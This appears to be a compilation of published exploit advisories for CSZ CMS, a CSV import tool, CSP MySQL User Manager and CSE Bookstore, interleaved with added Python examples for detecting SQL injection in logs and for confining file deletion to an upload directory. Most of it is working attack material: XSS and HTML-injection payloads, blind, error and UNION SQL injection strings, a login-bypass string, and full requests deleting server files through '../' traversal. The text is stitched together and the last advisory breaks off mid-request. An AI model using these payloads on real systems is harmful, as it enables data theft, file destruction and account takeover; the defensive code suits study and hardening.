    - Add or edit album(/admin/plugin/gallery):
    Album Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Keyword field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Short Description field: <noframes><p title="</noframes><svg/onload=alert(origin)>">

    - Add or edit Category(/admin/plugin/article/):
    Category Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
            
# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)
# Date: 2021-04-14
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip
# Version: 1.2.9
# Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46
# CVE: CVE-2021-43701

*Steps to Reproduce:*
1. First log in to your Admin Panel.
2. Then go to "General Menu > CSV Export / Import".
3. Open Burp Suite and configure it with your browser.
4. Then select any "Table Name", select "Fields Select" and select "Sort by".
5. Now click "Export to CSV" and intercept the request with Burp Suite.
6. The "fieldS[]" or "orderby" parameter is vulnerable. Let's try blind SQL injection using the query "(select(0)from(select(sleep(10)))a)" in the "orderby" parameter.

*Proof of Concept:*
http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV

*Output:*
By issuing sleep(0), the response is delayed by 0 seconds.
By issuing sleep(1), the response is delayed by 1 second.
By issuing sleep(5), the response is delayed by 5 seconds.
By issuing sleep(10), the response is delayed by 10 seconds.
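The three CSZ CMS SQL injection advisories above (the authenticated `members/view` sleep payload, the `article/search?p=` error- and time-based payloads, and the CSV export `orderby` sleep) leave the same two traces in a web server log: a decoded request containing `SLEEP(`, `EXTRACTVALUE(` or `UNION SELECT`, and a response time that matches the requested delay. The Python below is an added detection example, not part of any advisory; it parses a constructed access-log excerpt (combined log format with a trailing request-time field, request lines modelled on the PoCs) and flags lines whose double-decoded target matches one of the indicators, noting whether the response was slow enough to corroborate a time-based probe.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log excerpt: combined log format plus a trailing
# request-time field. The request lines are modelled on the PoC URLs above.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Apr/2021:10:00:01 +0000] "GET /csz-cms/plugin/article/search?p=3 HTTP/1.1" 200 5120 0.031
10.0.0.5 - - [22/Apr/2021:10:00:09 +0000] "GET /csz-cms/plugin/article/search?p=1%27%22%29%20AND%20%28SELECT%203910%20FROM%20%28SELECT%28SLEEP%285%29%29%29qIap%29--%20ogLS HTTP/1.1" 200 5120 5.012
10.0.0.7 - - [27/Jan/2024:11:12:13 +0000] "GET /cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20 HTTP/1.1" 200 2210 10.004
10.0.0.9 - - [14/Apr/2021:09:00:00 +0000] "GET /CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC HTTP/1.1" 200 310 10.020
10.0.0.5 - - [22/Apr/2021:10:01:00 +0000] "GET /csz-cms/plugin/article/search?p=sleeping+bags HTTP/1.1" 200 4096 0.028
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+ (?P<secs>[\d.]+)$'
)

# Indicators drawn from the three PoCs: MySQL SLEEP(), EXTRACTVALUE() error-based
# extraction and UNION-based extraction. Word boundaries keep ordinary words
# such as "sleeping" from matching.
SQLI_INDICATORS = [
    ("sleep", re.compile(r"\bsleep\s*\(", re.I)),
    ("benchmark", re.compile(r"\bbenchmark\s*\(", re.I)),
    ("extractvalue", re.compile(r"\bextractvalue\s*\(", re.I)),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]
SLOW_RESPONSE_SECS = 4.0   # corroborates a time-based probe


def decode_target(target):
    """Percent-decode twice so fully hex-encoded payloads (%73%6c... = 'sl...')
    and double-encoded ones are both inspected in clear."""
    return unquote_plus(unquote_plus(target))


def scan_line(line):
    """Return an alert dict for a suspicious request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m["target"])
    hits = [name for name, rx in SQLI_INDICATORS if rx.search(decoded)]
    if not hits:
        return None
    secs = float(m["secs"])
    return {
        "ip": m["ip"],
        "ts": m["ts"],
        "path": decoded.split("?", 1)[0],
        "indicators": hits,
        "slow": secs >= SLOW_RESPONSE_SECS,
        "secs": secs,
    }


def scan_log(text):
    return [alert for alert in map(scan_line, text.splitlines()) if alert]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["ip"], alert["path"], alert["indicators"],
              "slow" if alert["slow"] else "fast", alert["secs"])
```

The double decoding matters for the `members/view` line: every character of that payload is percent-encoded, so a single pass over the raw log would be the only thing a naive grep for `sleep(` ever saw. The response-time field is optional in most default log formats; enabling it is cheap and turns "someone sent SLEEP(10)" into "and the server obeyed".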
            
# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion
# Date: 2021-07-20
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.cszcms.com
# Software Link: https://sourceforge.net/projects/cszcms/files/latest/download
# Version: 1.2.9
# Tested on: Windows 10, XAMPP
# Reference: https://github.com/cskaza/cszcms/issues/32


################
# Description  #
################

# CSZ CMS is an open source content management system web application that allows managing all content and settings on a website. CSZ CMS is built on CodeIgniter 3 and its layout on Bootstrap 3. When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input can affect part or all of the parameter that represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has permission to delete). Furthermore, an attacker might leverage arbitrary file deletion to circumvent certain web server security mechanisms, such as deleting an .htaccess file, which would deactivate those security constraints.
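The fix for the pattern just described is to resolve the requested name against the upload directory and check containment on the canonical path before calling unlink. The Python below is an added example, not CSZ CMS code: `safe_unlink` refuses absolute paths, embedded NUL bytes and anything that resolves outside the upload root, and `demo` builds a throwaway web root (constructed: a `conf_secret_file.php` beside a `photo/2021/` upload, echoing the PoC's file names) to show a legitimate deletion succeeding while the traversal values are refused.

```python
import shutil
import tempfile
from pathlib import Path


def safe_unlink(upload_root, requested):
    """Delete `requested` only when it names a regular file inside `upload_root`.
    Returns True if a file was removed, False if the request was refused or
    nothing was there to delete."""
    root = Path(upload_root).resolve()
    if not requested or "\x00" in requested:
        return False
    candidate = Path(requested)
    if candidate.is_absolute():
        return False
    # Canonicalise (follows symlinks, collapses '..') and then check
    # containment on the canonical path, not on the string the client sent.
    target = (root / candidate).resolve()
    if root not in target.parents:
        return False
    if not target.is_file():
        return False
    target.unlink()
    return True


def demo():
    """Constructed layout: a web root holding a config file next to the
    uploads tree, mirroring the situation the advisory assumes."""
    web_root = Path(tempfile.mkdtemp())
    try:
        (web_root / "conf_secret_file.php").write_text("<?php // constructed secret\n")
        uploads = web_root / "photo"
        (uploads / "2021").mkdir(parents=True)
        (uploads / "2021" / "1626802955_1.png").write_bytes(b"\x89PNG")
        return {
            "legit": safe_unlink(uploads, "2021/1626802955_1.png"),
            "traversal": safe_unlink(uploads, "../conf_secret_file.php"),
            "traversal_deep": safe_unlink(uploads, "../../../conf_secret_file.php"),
            "absolute": safe_unlink(uploads, str(web_root / "conf_secret_file.php")),
            "secret_survives": (web_root / "conf_secret_file.php").is_file(),
            "upload_removed": not (uploads / "2021" / "1626802955_1.png").exists(),
        }
    finally:
        shutil.rmtree(web_root, ignore_errors=True)


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:16s} {outcome}")
```

A stricter variant, appropriate when the delete button only ever refers to the record's own upload, is not to accept a path from the client at all: look the file name up from the article or settings row by id and unlink that, so the request carries a record identifier rather than a file system path.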


##########
# PoC 1  #
##########

Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/editArtSave
Vulnerable Code: line 116, 131 - cszcms\models\plugin\Article_model.php

Steps to Reproduce:

1. Login as admin
2. Goto Plugin Manager > Article > edit any article
3. Upload any image as "Main Picture" and "File Upload" and click save button
4. Click "Delete File" button for both "Main Picture" and "File Upload" and click save button
5. Intercept the request and replace the existing image path with any file on the server via the "del_file" and "del_file2" parameters


1) Assumed there are files conf_secret_file.php and config_backup.txt in web root

PoC #1) param del_file & del_file2 - Deleting conf_secret_file.php and config_backup.txt files in web root

Request: 
========

POST /CSZCMS-V1.2.9/admin/plugin/article/editArtSave/4 HTTP/1.1
Host: localhost
Content-Length: 2048
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAMyATk1BfQaBOHvY
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/artedit/4
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=l9f1kpqohequemh1q3tt11j36hs99c25
Connection: close

------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="title"

article beta
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="keyword"

testing file
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="short_desc"

deletion
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="cat_id"

2
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="content"

<div class="row">
<div class="col-md-12">
<p>test for file deletion</p>
</div>
</div>
<p><br><br></p>
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="del_file"

../../../conf_secret_file.php
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="file_upload"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="mainPicture"

2021/1626802955_1.png
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="del_file2"

../../../config_backup.txt
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="file_upload2"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="mainFile"

2021/1626802956_1.png
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="lang_iso"

en
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="active"

1
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="fb_comment_active"

1
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="fb_comment_limit"

5
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="fb_comment_sort"

reverse_time
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="submit"

Save
------WebKitFormBoundaryAMyATk1BfQaBOHvY--

---



##########
# PoC 2  #
##########

Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/settings/update
Vulnerable Code: line 944, 958 - cszcms\models\Csz_admin_model.php

Steps to Reproduce:

1. Login as admin
2. Goto General Menu > Site Setting
3. Upload any image as "Site Logo" and "Image of og metatag" and click save button
4. Click "Delete File" button for both "Site Logo" and "Image of og metatag" and click save button
5. Intercept the request and replace the existing image path with any file on the server via the "del_file" and "del_og_image" parameters


2) Assumes the files conf_secret_file.php and config_backup.txt exist in the web root

PoC #2) params del_file & del_og_image - deleting conf_secret_file.php and config_backup.txt from the web root

Request: 
========

POST /CSZCMS-V1.2.9/admin/settings/update HTTP/1.1
Host: localhost
Content-Length: 5163
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8cAl5KcKGP0D3Qi2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/CSZCMS-V1.2.9/admin/settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=t5jloe106o2i5hst51chr5ita9aklieu
Connection: close

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteTitle"

CSZ CMS Starter
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="title_setting"

2
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteFooter"

&copy; %Y% CSZ CMS Starter
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteKeyword"

CMS, Contact Management System, HTML, CSS, JS, JavaScript, framework, bootstrap, web development, thai, english
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteTheme"

cszdefault
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteLang"

english
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="additional_metatag"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="additional_js"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="pagecache_time"

0
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="assets_static_domain"

demo@cszcms.com
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="html_optimize_disable"

1
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="del_file"

../../conf_secret_file.php
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="file_upload"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteLogo"

2021/1626800829_logo.png
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="del_og_image"

../../config_backup.txt
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="og_image"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="ogImage"

2021/1626800829_og.png
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteEmail"

demo@cszcms.com
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="email_protocal"

mail
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_host"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_user"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_pass"

123456
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_port"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="sendmail_path"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="email_logs"

1
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="googlecapt_sitekey"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="googlecapt_secretkey"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="ga_client_id"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="ga_view_id"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gsearch_cxid"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gmaps_key"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gmaps_lat"

-28.621975
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gmaps_lng"

150.689082
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="fbapp_id"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="facebook_page_id"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="adobe_cc_apikey"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_bg"

#645862
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_fg"

#ffffff
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_link"

#f1d600
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_msg"

This website uses cookies to improve your user experience. By continuing to browse our site you accepted and agreed on our 
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_linkmsg"

Privacy Policy and terms.
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_moreinfo"

https://www.cszcms.com/LICENSE.md
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_txtalign"

left
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_close"

Got it!
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="submit"

Save
------WebKitFormBoundary8cAl5KcKGP0D3Qi2--

---


# For more explanation, refer to the GitHub issue on cszcms: https://github.com/cskaza/cszcms/issues/32
# The affected version is 1.2.9.
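Both PoCs above work because the handler joins the submitted del_file / del_og_image value onto the upload directory and unlinks the result. The following is an added example, not CSZ CMS code: the vulnerable pattern beside a confined version that canonicalises the path (collapsing ../ and following symlinks) and refuses anything that lands outside the upload root. The directory layout (<webroot>/photo/<year>/), the file names and the function names are assumptions for illustration.

```python
import os
import tempfile

# Added example, not CSZ CMS code.  Assumed layout: uploads live under
# <webroot>/photo/<year>/ and the form field carries a path relative to that
# directory, as in the "2021/1626800829_logo.png" values in the requests above.


def unsafe_delete(upload_root, user_path):
    """The pattern behind the advisory: join the submitted path and unlink it."""
    target = os.path.join(upload_root, user_path)
    if os.path.isfile(target):
        os.unlink(target)
        return True
    return False


def confined_path(upload_root, user_path):
    """Canonical target path if it lies inside upload_root, otherwise None."""
    root = os.path.realpath(upload_root)
    # An absolute path makes os.path.join discard root; a NUL byte truncates the
    # name in C-backed APIs.  Neither is ever a legitimate upload reference.
    if os.path.isabs(user_path) or "\x00" in user_path:
        return None
    # realpath collapses ".." and follows symlinks, so a link planted inside the
    # upload directory that points outside it is caught as well.
    target = os.path.realpath(os.path.join(root, user_path))
    # Compare path components, not string prefixes ("/srv/up" vs "/srv/uploads").
    if os.path.commonpath([root, target]) != root:
        return None
    return target


def safe_delete(upload_root, user_path):
    """Hardened replacement: refuse anything that escapes the upload directory."""
    target = confined_path(upload_root, user_path)
    if target is None or not os.path.isfile(target):
        return False
    os.unlink(target)
    return True


def demo():
    """Constructed scenario mirroring the advisory: a config file two levels
    above the upload directory, a legitimate upload and a planted symlink."""
    with tempfile.TemporaryDirectory() as webroot:
        upload_root = os.path.join(webroot, "photo", "2021")
        os.makedirs(upload_root)
        secret = os.path.join(webroot, "conf_secret_file.php")
        legit = os.path.join(upload_root, "1626800829_logo.png")
        for path in (secret, legit):
            open(path, "w").close()
        # A symlink inside the upload directory pointing at the secret.
        link = os.path.join(upload_root, "innocent.png")
        try:
            os.symlink(secret, link)
            link_ok = True
        except (OSError, NotImplementedError):
            link_ok = False  # e.g. Windows without symlink privilege

        traversal = "../../conf_secret_file.php"
        results = {}
        results["safe_refuses_traversal"] = not safe_delete(upload_root, traversal)
        results["secret_survives_safe"] = os.path.exists(secret)
        results["safe_refuses_symlink"] = (not link_ok) or not safe_delete(upload_root, "innocent.png")
        results["secret_survives_symlink"] = os.path.exists(secret)
        results["safe_deletes_legit"] = safe_delete(upload_root, "1626800829_logo.png")
        results["unsafe_deletes_secret"] = unsafe_delete(upload_root, traversal)
        results["secret_gone_after_unsafe"] = not os.path.exists(secret)
        return results


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-28s %s" % (key, value))
```

The comparison is done on canonical paths with os.path.commonpath rather than a string prefix, and the symlink case is included because a naive ".." filter on the submitted string would miss it entirely.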
            
# Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# A low-privileged member who can send private messages can embed JavaScript
# into the admin panel: the User-Agent header recorded with the message is
# rendered without escaping on the Backend System Dashboard.

# Steps to reproduce:
1- Log in to the member panel.
2- Change the User-Agent header to <script>alert(1)</script>
3- Send a private message to the admin user.
4- When the admin user logs in to the Backend System Dashboard, an alert box pops
up on screen.

PoC Request:

POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: <script>alert(1)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1

csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=user-agent&message=user-agent&submit=Send
            
# Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# An authenticated user can inject a hyperlink into the Backend System Dashboard
# and the Member Dashboard via the message title.

PoC Request:

POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1

csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=<h1><b><a href="http://changeme/">Please
click to view</a></b></h1>&message=phishing&submit=Send
            
# Exploit Title: CSV Import & Export v1.1.0 - SQL Injection / Cross-Site
Scripting
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kağan Çapar
# Contact: kagancapar@gmail.com
# Vendor Homepage: https://codecanyon.net/item/csv-import-export/21105509
# Version: 1.1.0
# Category: Webapps
# Tested on: Kali Linux
# Description : The 'offset' parameter of the database table preview query is
vulnerable to SQL injection and the 'db' parameter to cross-site scripting.
====================================================
# PoC : SQLi :

Parameter: offset (GET)
    Type: UNION query
    Demo:
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=car-shop@localhost:3306&table=clients&order=asc&offset=30&limit=10
    Title: Generic UNION query (NULL) - 10 columns
    Payload: action=export_getInput&db=car-shop@localhost:3306&table=clients&order=asc&offset=30
UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x7178707671,0x78564b6846794858636354787350514d467a4863704d7a50735068495a6f7a5552625046616d6273,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL--
STgb&limit=10


====================================================
# PoC : XSS :

Payload =
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&table=clients&order=asc&offset=30&limit=10
            
# Exploit Title: CSP MySQL User Manager 2.3.1 - Authentication Bypass
# Date: 2018-05-04
# Exploit Author: Youssef mami
# Vendor Homepage: https://code.google.com/archive/p/cspmum/
# Software Link: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
# Version: 2.3.1
# Tested on: Linux 2.6.38-11
# CVE : CVE-2018-10757

##################################################################################
.__                                                  __   
|  |__ _____    _____   _____ _____    _____   _____/  |_ 
|  |  \\__  \  /     \ /     \\__  \  /     \_/ __ \   __\
|   Y  \/ __ \|  Y Y  \  Y Y  \/ __ \|  Y Y  \  ___/|  |  
|___|  (____  /__|_|  /__|_|  (____  /__|_|  /\___  >__|  
     \/     \/      \/      \/     \/      \/     \/      
.__        _____                            __  .__                      
|__| _____/ ____\___________  _____ _____ _/  |_|__| ________ __   ____  
|  |/    \   __\/  _ \_  __ \/     \\__  \\   __\  |/ ____/  |  \_/ __ \ 
|  |   |  \  | (  <_> )  | \/  Y Y  \/ __ \|  | |  < <_|  |  |  /\  ___/ 
|__|___|  /__|  \____/|__|  |__|_|  (____  /__| |__|\__   |____/  \___  >
        \/                        \/     \/            |__|           \/ 
                          .__                     
  ______ ______________  _|__| ____  ____   ______
 /  ___// __ \_  __ \  \/ /  |/ ___\/ __ \ /  ___/
 \___ \\  ___/|  | \/\   /|  \  \__\  ___/ \___ \ 
/____  >\___  >__|    \_/ |__|\___  >___  >____  >
     \/     \/                    \/    \/     \/ 

                                                                                                                                         
##################################################################################                                
SQL Injection Authentication Bypass
Product Page: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
 
Author(Pentester): Youssef mami (contact@hammamet-services.com)
On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( our blog )
On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info
##################################################################################
We just need to enter an admin login like this: admin' or ' 1=1-- with any password :-)
login : admin' or ' 1=1--
password: hammamet informatique services
            
# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection
# Date      : 2020-12-21
# Author    : Musyoka Ian
# Version   : CSE Bookstore 1.0
# Vendor Homepage: https://projectworlds.in/
# Platform  : PHP
# Tested on : Debian

CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in the pubid parameter of bookPerPub.php. Successful exploitation of this vulnerability lets an attacker dump the entire database the web application is running on.

Below are the results returned by sqlmap:

Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138#

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT


POC 1 

REQUEST
========
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
Host: 192.168.196.83
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
Upgrade-Insecure-Requests: 1

RESPONSE
========

HTTP/1.1 200 OK
Date: Mon, 21 Dec 2020 20:09:49 GMT
Server: Apache/2.4.38 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html; charset=UTF-8

Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1

POC 2
The web application is also vulnerable to SQL injection in cart.php: send a SQL injection payload in the bookisbn POST parameter.

REQUEST
=======

POST /ebook/cart.php HTTP/1.1
Host: 192.168.196.83
Accept-Encoding: gzip, deflate
Accept: */*
